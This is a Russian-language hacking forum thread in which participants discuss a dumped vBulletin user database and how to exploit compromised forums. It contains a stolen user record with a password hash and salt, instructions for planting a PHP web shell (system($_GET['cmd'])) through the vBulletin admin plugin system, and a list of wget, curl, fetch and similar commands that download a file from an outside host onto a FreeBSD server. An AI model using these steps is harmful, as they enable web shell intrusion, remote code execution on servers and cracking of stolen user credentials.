Может глупый вопрос, но что-то понять не могу. Вот сдамбил базу юзеров, получил примерно вот такую тему: INSERT INTO vb_user VALUES('1','6','','0','Rich','6c507b8dd286d058e69a 37436a751bde','2006-11-20','***@gmail.com','0','','','','','','2','Адм инистратор','0','1127663100','0','115946 4415','1163971905','1152297660','33','10','5','3', '0','0','0','0','2135','','0000-00-00','-1','1','','0','0','','0','0','-1','0','0','p\\u','2','','2','1','1');
А соль здесь получается "p\\u", или что?

Добавил: И что бы новую тему не создавать, помгите пожалуйста. 1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: Vbulletin: Справка - faq_complete
Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"]);
4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда А какой камандой после этого можно будет залить шелл на хост (FreeBSD)?

соль в булке состоит из 3 знаков, может в другой таблице

соль в булке состоит из 3 знаков, может в другой таблице
Лучше от этого мне не стало. :) Кстати во второй базе такая же тема, может что не так делаю? Да по другому вроде никак.

А может вообще в булке быть пароль без соли?

да вот она "p\u"..просто первый символ "\" добавляется для экранирования некоторых символов (в данном случае "\"), который могут нарушить работу скрипта.

А какой камандой после этого можно будет залить шелл на хост (FreeBSD)?
вбиваешь
which wget fetch curl links lynx
и смотришь какие качалки есть. в зависимости от этого вбиваешь нужное
- wget -o /tmp/file.c http://site.ru/file.c
- curl -o /tmp/file.c http://site.ru/file.c
- fetch -o /tmp/file.c http://site.ru/file.c
- lynx -source "http://site.ru/file.c" > /tmp/file.c
- links -source "http://site.ru/file.c" > /tmp/file.c
- GET http://site.ru/file.c > /tmp/file.c
на примере ты скачиваешь с сайта site.ru файл file.с и сохраняешь его в папке /tmp

Цитата:
1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: Vbulletin: Справка - faq_complete
Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"]);
4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда
А какой камандой после этого можно будет залить шелл на хост (FreeBSD)?

собственно шелл ты мы уже получили, зачем еще один :confused:

вбиваешь
which wget fetch curl links lynx
и смотришь какие качалки есть. в зависимости от этого вбиваешь нужное
- wget -o /tmp/file.c http://site.ru/file.c
- curl -o /tmp/file.c http://site.ru/file.c
- fetch -o /tmp/file.c http://site.ru/file.c
- lynx -source "http://site.ru/file.c" > /tmp/file.c
- links -source "http://site.ru/file.c" > /tmp/file.c
- GET http://site.ru/file.c > /tmp/file.c
на примере ты скачиваешь с сайта site.ru файл file.с и сохраняешь его в папке /tmp
Большое спасибо!

собственно шелл ты мы уже получили, зачем еще один :confused:
Я понимаю, что шелл есть, просто юзать такой шелл для меня труднова-то. Вот я и хочу залить шелл, который мне нравится. :) Кстати, спасибо за помощь.

вместо этого смд можешь спокойно заливать свой нормальный шелл!

Да я знаю, но работать он что-то отказывался. А смд пашет нормально. :)